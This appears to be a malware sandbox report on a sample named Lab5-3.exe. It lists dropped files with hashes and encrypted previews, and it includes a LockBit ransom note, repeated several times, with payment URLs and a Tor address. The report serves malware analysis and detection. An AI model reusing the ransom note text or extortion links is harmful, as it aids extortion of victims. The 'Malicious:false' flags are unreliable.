                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.928101505830119
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:F1ihiI3vXMHnn0qCzy6Hh7yHfUTid3hBaUoSGFcmeykEdEElU92i:novMajGx0uKeY2ElUJ
                                                                                                          MD5:94A7EA3466D2437C6AABC549F9D069FC
                                                                                                          SHA1:D8192CDA7E81AE53039928391D76657A5007F820
                                                                                                          SHA-256:DFA26B01077A038C673145C3AA55678AF6EF475C804C2B32025DB7657619A532
                                                                                                          SHA-512:562375E19C0AFA97B1B14B017680823797214E44CC5A2DDC8971A42FDFFDA9C64B63E493757E13E2B522045EA01ACE75DB1BA60FF36D9C8B6F91F7EF4A0AF852
                                                                                                          Malicious:false
                                                                                                          Preview:..\..dam5.qm..-.;.N..P.C..............P_P.&/.,.b..j7..o......gE....Q.t!.8...g^.'5........@.T..z7....G.g..i../......@4.b..U.|....>.fS.....A.R.td.n=..l.;.].P<.....T.....<...(................p.n.N.....Q...........{s......5.#..@.k........D+...V...E...4z...y&.cbq.#....U...eU..B.".8..k$L..?....B..vwQdC....fkU.RV.!......I.7.#&?.AkH2.R....6.sd..?.x.....l..a....GZ...+.."xe..6.V..\.L....sh.aJsWn_,D...4||.......D6.5..0....ly.....$S.X.".UF.....qq.....hq$oW>.'....w....Z...l_...JU....J.z`#..kx...r.......+Cg..9....#~....M....X.9...d?{..k..7.g....i.es..C..B..fi...y..cH.rg.jEz..p....D...%o5 .k.+.....w$a.....$.^........,.../0I...n..p.J]....1.A3.q2......T.\..piX.k#Hw+...s..3..D+~...X.W.I...n.sS5....}.`..2..@.........S.6B..R....c.......;\.*...zi.........e...$.6F7X..u..(...R.8.v~.J.C.w..Nbv.5.......V.......t.`.q.i......Q_.UG.2.@......[.......<.b.w.={....W..@........#.9....!h...'g2P.kg.."m..Y../_....z...}5....Y...........&T.T...?.i......yA.8..k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):666977
                                                                                                          Entropy (8bit):6.948224792736355
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:eSHTZDIgz4EmLDUFJNwldhNtondjTbmUOjBj8bmUOjPjWEPYZYZYNV8Yxww5FCQ/:pTZEgzXEDONwldl2djTbmUOjBj8bmUO8
                                                                                                          MD5:0EFC23AD3E309FB9EAA78CD2E41AF1D6
                                                                                                          SHA1:C5BF0162993ED4A3EF883733C9BCDBC0509E8219
                                                                                                          SHA-256:D89F35A96BD30304CB522D1D5C40D533387A0A52860E4D475FBB4459CCAB5DB1
                                                                                                          SHA-512:9970442680AFA5C937893A4FC05470A1EB42CB767A1A7FC92BB56D7AFF554AB3EA250E7CE4BE848618EA62C1417567DFA2A1AD459AB60E47322ECB9E47A4D3B1
                                                                                                          Malicious:false
                                                                                                          Preview:..>...<.C ..4.|-.k.;......%..8...R..Ql.....(...O..%...2...,d.c,.{...nx2n....>..yP.....O......9.bl.......H...>.8........ .......w..X..8.h(..*l.......p.Z........lI.b.G......C.t...)..`...P...&.0...^..1A.c.O.`..%&_v#.a.K...A./r.'x....b&.........>...KH.......<..0..-....n.E=jL.~:...D.....0.$I....e.`u./.p..L....'....4. ..]W..sv3....&....o."!H...+M... ......Nj.0.c....O....N.$..Ft.!F_......l...6z.Ee.:......].6......~....^V.y..k.KV..k.....=V.(h^.P......U].../........*.....4.c... .|,`...Xe....W....2_.nJ[..b{F...g...Q...S.@..|.{`_....$d......_.....G8.6.......C.`...%.s..;.. p..$....6_ ..(zm...#1..?.!.'#".R.S......FI.c8.....:O. >.\.&..D.....8.....d>5.K...].........I.7...M.D..y......&..G...j..l...<..~.?...Y.z..X.dz..!...~.g.....x..~.l..[.......S.............._.'6/. ...4..S/#q...u".'.t...h2vou7......B.3.X:...9}.[.m..K........J4...jx9.BP....f.|%....Ddb..$...g..E.W|LF....v..,......'N..."...4..Dx|2..4. ..7{!3..n...C*E.%2W.mK..s.....6~.G....{
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4576
                                                                                                          Entropy (8bit):7.9550545659486325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:BBiO+m3xIsgnu+DQIJur0d0WqcCLmaVSfnTYQdmrxGx0uKeY2ElUJ:mO+GIKIJkI0WP3cs1mm0Cb
                                                                                                          MD5:2A7A42A9112EA16B0857228899F8D0AB
                                                                                                          SHA1:28AA6D6599317F360042E5FAF59234D6C2104075
                                                                                                          SHA-256:6E7F5DDBA191E5D5440EC815AF0138E3E0B61D6D71D16F2548613D46144AC2C9
                                                                                                          SHA-512:F42EB38C4EC6AF49A8E9716EC742D155DEFF9FCF9959E9281BD849755DCDE5961DBD8DE381CF81ACC7F4DD5C5056215079A15F35C2C14D3D153971172A9D8116
                                                                                                          Malicious:false
                                                                                                          Preview:u..M.W..A..8.A. ..w.,f[....p.H...EeBjo9..Sx..qf.gr.e".Y..N-.x"!8.w..P....}..r.x...j..O.r.8Y=..UsB.<...ik.>.S.../...B....1.A.B.......- .}.='(,!.x.HL..(...B.S..3{.......f..nA.M....[Hz,..+..h.U0aw+dOWJU...U....v.e..!.[:..C.#......fI..............S...^c7`%...Y.x.$M...yv./...(ipq......O...."..W9.aF.N.....(.S?.'R#?i..... .B.8....y<%8..\.N......=./@.w......L..w..bl.`.M..yj....@..n|.u..V..;.wb......5H"M .&...u.;.{O.....J.....Lr(.Z6..4...M4#.=`..../.5r....{.h.0..3L..%.....}...%...g.._P........v-..9j.j..PV..$....e......J.Z...2Wn-...yxM]M..Bk.h...O.".+8..Z.j.N.X.6.=..4...n....h.....~.:.x...0......g.0.k..C.y.H..zK..5%.l/..+..o..R....^zl.......]:!KjwjB-.._...T.jH?..........*o?...../w.g..|c1.-.....q..`j1..&.D..ulM<;.3Y.:..2.>....).Jl..Y.D... .1.k.'VL...E.a.........e"C....m.....4Q...TG%..6..d..B.....1..'@7#e~..G.<...D..Dy-....._4..5.d. .l.m.H.._.....Z2....@.FM.*Y..........L. .!.e0^..f.o..P2U...)P.baSZ.AM......M..'u.x1C~..p.lE.(.K.|..TEv.......[.s.t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3104
                                                                                                          Entropy (8bit):7.941310373908573
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qKlMWKC6+eIMSuOJ0HxQ6f74MHYSIbycizSHfUTid3hBaUoSGFcmeykEdEElU92i:nD/+SXYf78+tGx0uKeY2ElUJ
                                                                                                          MD5:DFA618C288E136E8168176BB7FFD91B9
                                                                                                          SHA1:7A765F2490AD94EF03F4B9AD6D153C4316202396
                                                                                                          SHA-256:5D66ED787159451B4BD9AB104C4399A76E4B35273056D60A4A46F3D96B36E29D
                                                                                                          SHA-512:1C47B7EE26D7423AD0D2CED9D26EBAEE471BD8DE328B0DBBAC9FE1983B43086FE5A775743CD41AE1647001C680225DEC28069A90A05266C1036AED9FBC9B68B6
                                                                                                          Malicious:false
                                                                                                          Preview:4<.N...*K!.....7g./...D.2....[.#.....hQ#.....t>&]>..2...L....:s6J}d..".#N..../a...`....+&b.f.ra.mC.v.)...>...=....7G|..#.~.O..p..J.-.g..Yb|P36.......u7..{..*..*.~.....F.....9.....2Z@.pe..b}....C..;7.<Y...N.g<+,..RF....V.h..|.....UjS.}...G.T.....p...q....o....Z...........=.Lj....pX4..?.....{..._.|Y.[.....j....pf......K.`yV....[h-^.Y..3p&5........B9...8b.:w.?$.....&...s3Y......h.[...9A..i...k...V..a.......|@Z....l........@.K.....|.~......d.;...N........q.M...!.W..q.>.........Z?.h.a...#.z`...H.*..V.j.x...(:ei"..X..*.~t%B..J..1L.d...T2#.....}UK...F~.-......:..(.CpFwb6..D...+...e.=..........W.{......@.....v...#D.....tCSg4L4g>7..N.H..,...r...K.|:&m....b..............:.T..O7VVR..^u[.u.wU........[...r.45..Z[...O\;..z.G..,.....>n?..d.!?..J?.U.@...J.Y.(q....zPf.h.......X..,............JZ.?.{......6...4H...b...f9.z._.)v...<..d}.+Q.7.....L..r...%.;h..z..<.....[......$..5.....XQW.g.PQ..........b..2E.....?H>D`..:\.C.).$FA@..(.fY?E.#.G4J
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2448
                                                                                                          Entropy (8bit):7.93907164909283
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:G9Xf99x6BU1sq1BPYP9JF+aHfUTid3hBaUoSGFcmeykEdEElU92i:G9fZ6BS1BPFGx0uKeY2ElUJ
                                                                                                          MD5:FC876212324E59F6248A49D4A54FD3B8
                                                                                                          SHA1:34620FA7EB928286DDBC125F28AC8CB30D4E7B00
                                                                                                          SHA-256:5B5D7D443A20ED3909612EB46A4B9DCCA477A1540CF842ECFD75C191771BEA80
                                                                                                          SHA-512:571885FC3EE4E218D27EB62828DA3CD1C5A21092C27BADE681C6EA65D5F7198E396EA2876EFBC589BAD22279F711F6FFFEADAB48786DFB5D3075006677DE17D2
                                                                                                          Malicious:false
                                                                                                          Preview:..._...J...(q......._.N......ta.u@..~4......z.G.....S>.....9.....-...v..N....v..^.d..X.:.t...\.^RXWe.#...|C=.V-...=F...;2..2E..~}.$btP.UR*...(..t..........w."........e...\..9.0..m...~...T.".w}?<...p.g%.....H....s.-..|E!... .m.4.lFt(.:.%.....5:..X...4..;.;...K......-..:..#....Gb........<UZ.....I+....5R[...K.H(....4.t...6...YF....n#...U...&....%.;..<..$..4.i.ZkV...[.B.f[{..T.fr....q..*h.\...g.z../$v,(2.i.<4..".D.yY.../g.}.Kee%..1.........{.B .....2..C&j.,.X.].m....Ju.t.....[.VV..UD#.xI..{]L..bz...(..i.{...W.....%..Z.m..xU.q.b...+.I.]fiYH.V...B.kGE...\..w.?oL..e.G..Y2.q.,.%.._E..0.....Z..RN_e.?....W.-....im.W.S..c.fU...@..M.x...d:..........N...jv..@'.l..C.oj>".L.&........c}ih.k[:.#>...{I...R.C.}.]m...k......|wF...9J5..#....B.k.g;.+..JY.}......=.9r0...%X.lf...>l|s(v9....K..J...Z...Q.!R..p.z..m.......n..s..-...Z.. &.{R....*.]2#....o..%/Ut..x..q..K...=...N.^..d..w..+..$..?..=.'..).e...dk...l.8.....{.q.a....).....S.....z......B3.h.98.b....TM.._[.>....[..3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6416
                                                                                                          Entropy (8bit):7.973886548704703
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:dr/BZYfA6Jwkx0bNbKrFZjSWWgd/6y+VD0Cb:1/7cbJwkOb2nWVDtb
                                                                                                          MD5:35F9E95A6B59F5E2A8A1DDE8DC7E1AF8
                                                                                                          SHA1:D703EA74DCFCFEC0B371BA975B84F6F26BF19722
                                                                                                          SHA-256:7060707F573567A780066A554FE38A34F5E8831005C8D83F13BD8E558F11221E
                                                                                                          SHA-512:08DBCA5AD42D6D3DFE656FC028A3A9DADD1689AB354A1C1EA27F757C8B42E39CFB7E58B6D9E802CEFBA638E9887C7C54D64EC444FBFC96A248CFD07A19C0480F
                                                                                                          Malicious:false
                                                                                                          Preview:.YfJ.A.B.k..h.3.....P"... ......b...e=<(.3.@.9...xOjU^G.-.ZQ...h..e..i.Zw3k.n.i.....5%...}.3_...%.W..).h...{z.e.......s..b}..~.%T.c..B..`.H(..1.Sb].....A....I.5/....ssL..j.....T..Jp.z...6.Tq2..&.6....^....'p..`...e.Z...e.g........Tg..fS...c..l...W.@....nfD9...;..h..g....9....8...e..J..f....vY|......$.h..,u.-n...(...a.<.......9_M\;..e"{>7m...5pUEg.t......"D.'DM.'c.........3.7....?.c.V.E..... e.....A.le66.....Y..)WN....N...*{sE.O.:..$|.......dJ..Xb..C.........cY.:5...].#lf).4W....Cn.U.m......A.r...5j(.l.....zK........G.J..t.c..6M...-.].......tQW....}....F.d....u....S..@a..,.hU.,St.'.2.b.%n. .c.[..........y%0.....`...5.NO..ef63...3t..Id.6Q..+.4..d.IY3c.6(......I........Y..-.......N.\..(...$8.l.N+4..;...jg..P...76q@.2..qy.t.Wa..E.V.".g...}/.....Y.p.A!.`z.K4.d..9?..;-`..R.!.Y6..|...+.p..R.zJ....V...5;......../.M.^/..UAJ.~!8.d.G`IE}.Sv0.]C.s.n..o8.#..U.KC..>A.....*.'5...6h......Zn..q.}.V...Mu...3....0.|H.<.....h...%.fc......T.L+..>.i....C.B.P
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6448
                                                                                                          Entropy (8bit):7.971554153096173
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:0h3S8JwgJKsYVfxv5GC35jVaAUfcROH0Cb:0h3Pw4URVaAJRctb
                                                                                                          MD5:E6BB7652ADD045859236D9752A517918
                                                                                                          SHA1:BF9A8BC0127BD7801A215188ACD965A162427EEC
                                                                                                          SHA-256:889A62B1E9FEF93CEE30762CF2DBAD285A5A8AE63F7CA1394EF2022CF70AD4C7
                                                                                                          SHA-512:2AFE75AD428AD64C78B0FFBF54B27DBA5DBB6B6498CDC9D3F7F3EE0D985F198CA2A0609E30806E1A3768526D99EAB8159C69DD16A5B188CB2B69F85EDF32A2FF
                                                                                                          Malicious:false
                                                                                                          Preview:(..z......zj)ge....j...\*c&.|..p.l..`=...$....1Z"u........m.........G..x.$4.b.i.8.o.`|.9.._c...LvH.U..%..C...{gi.{<.+.D.~`.g...w.mR.~..E.P..E>.....w_.I76....f$..`.z.KE?m.c52N.2..!.n..&..L{h.......EUB.L{<..&j.:.o....H..88.S..'..@1..|NK.}.t.[....iy.Q...y.._.......F.f...i...zP..S3S.$..*.<...`)b...,....@.m.XT8ef.s<.Qq'L....U6......r.5_ N{.`..(.).........Q........l....5.......?-.G1..Dr~...{.#.g.c1..D..FK...Ie...|v...p..E...uk.a..P.Q)..9{'52.........."8.!lzl..*..\..].1..x..............,..b.kG..T(.$.p:<".......mE...).p.....GO|...ia.-*........I&]........B*.>W...&m.I_A.g,..}..\3...p.....@.v.:.....=^a.Z....(....9..(K,...dYI._ [.TI,8...g..M.M.rl.Z.v....z_..v..pPnN9..]...O..h...G....qv.5Z.;2HE)..L7..YV!.......=...hY....."$.).Ps.4z..F{..%2!>...[4.....j/BR]..T..)...KU..^.E.\q...D..lU..f.......N......z...4.;.....D.k...]...^.b..y.o.......vr"....z.D.n.P.....VR....@..y...)N.u.\...`... .0Ta.".C1.]..lQ../........./..k.E.".S.a........H....d5 .dB..z"............t,.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5952
                                                                                                          Entropy (8bit):7.970308675528759
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:m8bmFr8cWsDZO+NEf80EclRy/ZY8WANo4Qqb/vFzCNdsPTvGx0uKeY2ElUJ:Fmt8TSNkEYR29oqb/vF1rM0Cb
                                                                                                          MD5:9763AD3CC34DBD2DA036D3DD7793C5B9
                                                                                                          SHA1:8D9A99BE76FBD6DB43EE59C395326085CA257A2A
                                                                                                          SHA-256:93403B1AA49F2F59DBCEE3386A3D81C75BBC638193574B12D28CFA32C46456D7
                                                                                                          SHA-512:FD9737115A893468CF2D8D8BAC79F2996EC7E8B4219EAD1A6C6D22D67FD34E884CC5789379DF9A90A3CB370A558214FA388A2185991CD28882BE9ADF723EF2D0
                                                                                                          Malicious:false
